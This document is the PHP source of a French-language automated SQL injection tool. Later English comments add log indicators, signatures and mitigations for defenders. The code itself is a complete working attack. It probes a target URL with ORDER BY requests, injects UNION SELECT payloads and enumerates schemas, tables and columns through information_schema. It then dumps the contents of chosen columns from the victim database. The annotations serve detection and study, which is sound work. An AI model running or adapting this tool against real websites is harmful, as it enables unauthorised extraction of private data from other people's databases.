#Auto MySQL Injector Beta v0.7
#Auteur: Hypnoze57
#index.php:
<?php
##############################
# Injecteur de requêtes SQL #
# Codé par Hypnoze57 #
##############################
# Web front end of the tool: reads a target URL from the query string and runs the
# helpers from fonctions.php against it in a fixed order, printing what each one returns.
#
# Indicators visible in this code and its helpers (match case-insensitively in access logs):
#   - '+OrDeR+bY+<n>--+-' requests with n counting up from 1 (at most 50)
#   - '+UniOn+SeLecT+1,2,...--+-' column lists
#   - 'GrouP_CoNcaT(' wrapped in 0x3A6835373A / 0x3A2F6835373A (ASCII ":h57:" / ":/h57:")
#   - the literal 0x4879706E6F7A653537 (ASCII "Hypnoze57")
#   - reads from information_schema (schemata, tables, columns)
#   - presumably no User-Agent header, since file_get_contents() is called without a
#     stream context (depends on the host's user_agent ini setting; confirm)
# Mitigation on the receiving application: parameterised queries, no database or PHP
# error text in responses, and a least-privilege database account.
session_start();
# Removes PHP's execution time limit for this request.
set_time_limit(0);
require_once('fonctions.php');
$version = 'Beta v0.7';
echo '<title>Injecteur SQL Automatisé</title><link rel="stylesheet" media="screen" type="text/css" title="Design" href="style.css" />';
echo '<b><u>Injecteur SQL automatisé version '.$version.'</u></b><br /><br />';
# Runs when 'url' or 'db' is present; 'db' without 'url' ends at the empty-URL message below.
if (isset($_GET['url']) OR (isset($_GET['db']))) {
if(!empty($_GET['url'])) {
# NOTE(review): the pattern is unanchored, so it only requires the substring 'http://'
# somewhere in the value; it does not restrict what the helpers pass to file_get_contents().
if(preg_match('#http://#', $_GET['url'])) {
# The URL-decoded parameter is HTML-entity-encoded and then used as the fetch URL.
$url = htmlentities(urldecode($_GET['url']));
# Second copy of the same value, kept unmodified for the result links the helpers print.
$url_dep = htmlentities(urldecode($_GET['url']));
$nb_col = nb_col($url);
echo 'Nombre de columns : <font color="red">'.$nb_col.'</font><br />';
# Every '=' in the URL becomes '=-'.
$url = str_replace('=', '=-', $url);
$url = injection($url, $nb_col);
$str_col = string_col($url, $nb_col);
echo 'String column valide : <font color="red">'.$str_col.'</font><br />';
find_vers_user($url, $str_col);
echo '<u>Bases de données : </u><br /><br />';
find_db($url, $str_col, $url_dep);
# Each of the next three helpers only acts when its own query parameter is present
# ('db', 'tbl' and 'col' respectively).
find_tbl($url, $str_col, $url_dep);
find_col($url, $str_col, $url_dep);
find_content($url, $str_col, $url_dep);
echo '<br />';
} else {
echo 'URL Incorrecte ...<br />
<a href="index.php">Retour à l\'index</a><br />';
}
} else {
echo 'Entrer un lien a injecter ...';
}
} else {
# No parameters: show the input form, which submits 'url' by GET to this same script.
echo '<form action="" method="get">
URL : <input type="text" name="url" size="50" placeholder="http://site.com/page.php?id=1" value=""><br />
<input type="submit" value="Inject">
</form>';
}
echo '<br />Coded by Hypnoze57';
?>
#fonctions.php
<?php
##############################
# Fonctions de requêtes SQL #
# Codé par Hypnoze57 #
##############################
#Recherche du nombre de colonne;
# Estimates the column count of the target query.
# Requests $url with '+OrDeR+bY+<i>--+-' appended for i = 1..50 and stops at the first
# response containing "Unknown column", "on line" or "Warning MySQL"; returns i - 1.
# If no response matches, $col_nb is never assigned and an undefined variable is returned.
# The return value of file_get_contents() is not checked for failure.
#
# Defender note: the probe works only because error text reaches the client. A run of
# requests from one client with an incrementing ORDER BY index is the log pattern.
function nb_col($url) {
for($i=1;$i<=50;$i++) {
$page = file_get_contents($url . '+OrDeR+bY+' . $i . '--+-');
if(preg_match("#Unknown column|on line|Warning MySQL#", $page)) {
$col_nb = $i -1;
break;
}
}
return $col_nb;
}
#Première injection;
# Builds the comma-separated list "1,2,...,$nb_col" and returns $url with
# '+UniOn+SeLecT+<list>--+-' appended. String building only; no request is made here.
function injection($url, $nb_col) {
$chaine = '';
for($i=1;$i<=$nb_col;$i++) {
$chaine .= $i.',';
}
# Drops the trailing comma left by the loop.
$chaine = substr($chaine, 0, -1);
$url .= '+UniOn+SeLecT+'.$chaine.'--+-';
return $url;
}
#Recherche de la colonne vulnérable;
# Finds which column position is reflected in the response.
# For i = 1..$nb_col, replaces the substring ',<i>,' in $url with the hex literal
# 0x4879706E6F7A653537 (ASCII "Hypnoze57"), fetches that URL and returns the first i
# whose response contains "Hypnoze57".
# If no response contains the marker, $str_col is never assigned and an undefined
# variable is returned.
#
# Defender note: the hex literal in the request and the string "Hypnoze57" in the
# response are fixed values and usable as signatures.
function string_col($url, $nb_col) {
for($i=1;$i<=$nb_col;$i++) {
$str = str_replace(','.$i.',', ',0x4879706E6F7A653537,', $url);
$page = file_get_contents($str);
if(preg_match("#Hypnoze57#", $page)) {
$str_col = $i;
break;
}
}
return $str_col;
}
#Recherche de l'user et de la version de la bdd;
# Prints the database version and current database user reported by the target.
# Replaces ',<$str_col>,' in $url with GROUP_CONCAT(":h57:", VERSION(), ":/h57:"), fetches
# the page and captures the text between the two markers; then swaps 'VerSion()' for
# 'UseR()' and repeats.
# Neither preg_match() result is checked, so $version[1] / $user[1] are undefined offsets
# when a marker pair is absent from the response.
# NOTE(review): the captured text comes from the remote response and is echoed without
# escaping, so the fetched page controls markup rendered in the browser of whoever views
# this output.
function find_vers_user($url, $str_col) {
$url = str_replace(','.$str_col.',', ',GrouP_CoNcaT(0x3A6835373A,VerSion(),0x3A2F6835373A),', $url);
$pg = file_get_contents($url);
preg_match('#:h57:(.*):/h57:#', $pg, $version);
$url = str_replace('VerSion()', 'UseR()', $url);
$pg = file_get_contents($url);
preg_match('#:h57:(.*):/h57#', $pg, $user);
echo 'Version : <font color="red">'.$version[1].'</font><br />User : <font color="red">'.$user[1].'</font><br /><br />';
}
#Recherche des bases de données;
# Lists schema names and prints each as a link back to this script.
# Replaces ',<$str_col>,' with GROUP_CONCAT(":h57:", SCHEMA_NAME, ":/h57:") and rewrites
# the '--+-' trailer so the query reads from information_schema.schemata.
# $url_dep is the unmodified target URL, url-encoded into each link's 'url' parameter.
# NOTE(review): $base comes from the remote response and is written into both the href
# and the link text without escaping or URL-encoding.
#
# Defender note: a request naming information_schema.schemata together with the
# 0x3A6835373A marker is specific to this step.
function find_db($url, $str_col, $url_dep) {
$db = str_replace(','.$str_col.',', ',GrouP_CoNcaT(0x3A6835373A,SchEmA_NamE,0x3A2F6835373A),', $url);
$db = str_replace('--+-', '+FroM+iNForMaTion_SchEmA.SchEmAta--+-', $db);
$page = file_get_contents($db);
# Removes every comma from the whole response, which is why the delimiter below has
# no comma between the markers (the other helpers split on ':/h57:,:h57:').
$page = str_replace(',', '', $page);
preg_match('#:h57:(.*):/h57:#', $page, $db_name);
$bdd = explode(':/h57::h57:', $db_name[1]);
foreach ($bdd as $base) {
echo '<a href="?url='.urlencode($url_dep).'&db='.$base.'">'.$base.'</a><br />';
}
}
#Recherche des tables;
# Lists the tables of the schema named in $_GET['db']; does nothing when 'db' is absent.
# The schema name is converted with str2hex() and compared against TABLE_SCHEMA in
# information_schema.tables; each captured table name is printed as a link adding 'tbl'.
# $url_dep is the unmodified target URL, url-encoded into each link's 'url' parameter.
function find_tbl($url, $str_col, $url_dep) {
if(isset($_GET['db'])) {
# NOTE(review): $_GET['db'] is echoed without escaping; find_col() and find_content()
# pass their heading values through htmlspecialchars(), this heading does not.
echo '<br /><u>Tables de la base '.$_GET['db'].' : </u><br /><br />';
$tbl = str_replace(','.$str_col.',', ',GrouP_CoNcaT(0x3A6835373A,TabLe_NaMe,0x3A2F6835373A),', $url);
$db = str2hex($_GET['db']);
$bd = $_GET['db'];
$tbl = str_replace('--+-', '+FroM+iNForMaTion_SchEmA.TabLes+where+TabLe_SchEmA='.$db.'--+-', $tbl);
$page = file_get_contents($tbl);
preg_match('#:h57:(.*):/h57:#', $page, $tbl_name);
$tables = explode(':/h57:,:h57:', $tbl_name[1]);
foreach($tables as $tbl_fin) {
# NOTE(review): $bd (request parameter) and $tbl_fin (remote response) are written into
# the href and link text without escaping or URL-encoding.
echo '<a href="?url='.urlencode($url_dep).'&db='.$bd.'&tbl='.$tbl_fin.'">'.$tbl_fin.'</a><br />';
}
}
}
#Recherche des colonnes;
# Lists the columns of table $_GET['tbl'] in schema $_GET['db']; does nothing when 'tbl'
# is absent. Only 'tbl' is checked with isset(); $_GET['db'] is read without a check.
# Both names are converted with str2hex() and compared against TABLE_SCHEMA / TABLE_NAME
# in information_schema.columns; each captured column name is printed as a link adding 'col'.
# $url_dep is the unmodified target URL, url-encoded into each link's 'url' parameter.
function find_col($url, $str_col, $url_dep) {
if(isset($_GET['tbl'])) {
echo '<br /><u>Colonnes de la table '.htmlspecialchars($_GET['tbl']).' :</u><br /><br />';
$db = str2hex($_GET['db']);
$tbl = str2hex($_GET['tbl']);
$url = str_replace(','.$str_col.',', ',GrouP_CoNcaT(0x3A6835373A,column_name,0x3A2F6835373A),', $url);
$url = str_replace('--+-', '+FroM+iNForMaTion_ScheMa.columNs+WhErE+tablE_scheMa='.$db.'+AnD+TablE_nAme='.$tbl.'--+-', $url);
$pg = file_get_contents($url);
preg_match('#:h57:(.*):/h57:#', $pg, $col_name);
$colonne = explode(':/h57:,:h57:', $col_name[1]);
foreach($colonne as $col_fin) {
# NOTE(review): the heading above escapes $_GET['tbl'], but here $_GET['db'], $_GET['tbl']
# and $col_fin (remote response) go into the href and link text unescaped.
echo '<a href="?url='.urlencode($url_dep).'&db='.$_GET['db'].'&tbl='.$_GET['tbl'].'&col='.$col_fin.'">'.$col_fin.'</a><br />';
}
}
}
#Recherche du contenu;
# Prints the values of column $_GET['col'] from $_GET['db'].$_GET['tbl']; does nothing
# when 'col' is absent. Only 'col' is checked with isset(); 'db' and 'tbl' are read
# without a check. $url_dep is accepted but not used in this function.
# Unlike find_tbl() and find_col(), the three request parameters are concatenated into
# the fetch URL as-is rather than through str2hex().
#
# Defender note: this is the step that reads application data, so a request combining the
# 0x3A6835373A marker with a FROM clause naming a non-system schema marks the point at
# which record contents were returned.
function find_content($url, $str_col, $url_dep) {
if(isset($_GET['col'])) {
echo '<br /><u>Contenu de la colonne '.htmlspecialchars($_GET['col']).' dans la table '.htmlspecialchars($_GET['tbl']).' :</u><br /><br />';
$url = str_replace(','.$str_col.',', ',GrouP_CoNcaT(0x3A6835373A,'.$_GET['col'].',0x3A2F6835373A),', $url);
$url = str_replace('--+-', '+FroM+'.$_GET['db'].'.'.$_GET['tbl'].'--+-', $url);
$pg = file_get_contents($url);
preg_match('#:h57:(.*):/h57:#', $pg, $content);
$contents = explode(':/h57:,:h57:', $content[1]);
foreach($contents as $content_fin) {
# NOTE(review): $content_fin is text from the remote response echoed without escaping,
# so stored data containing markup is rendered in the browser of whoever views this page.
echo '<font color="red">'.$content_fin.'</font><br />';
}
}
}
#Fonction de conversion de table (exemple : admin = 0x61646d696e) - fonction coder par Luxerails;
# Returns '0x' followed by dechex() of each byte of $str, e.g. "admin" -> 0x61646d696e.
# dechex() does not zero-pad, so a byte value below 0x10 contributes a single hex digit.
# NOTE(review): the curly-brace offset syntax $str{$i} was deprecated in PHP 7.4 and
# removed in PHP 8.0, which dates this sample to PHP 7.x or older.
function str2hex($str) {
$strout = '0x';
for ($i=0; $i < strlen($str); $i++) {
$strout .= dechex(ord($str{$i}));
}
return $strout;
}
?>
Hypnoze57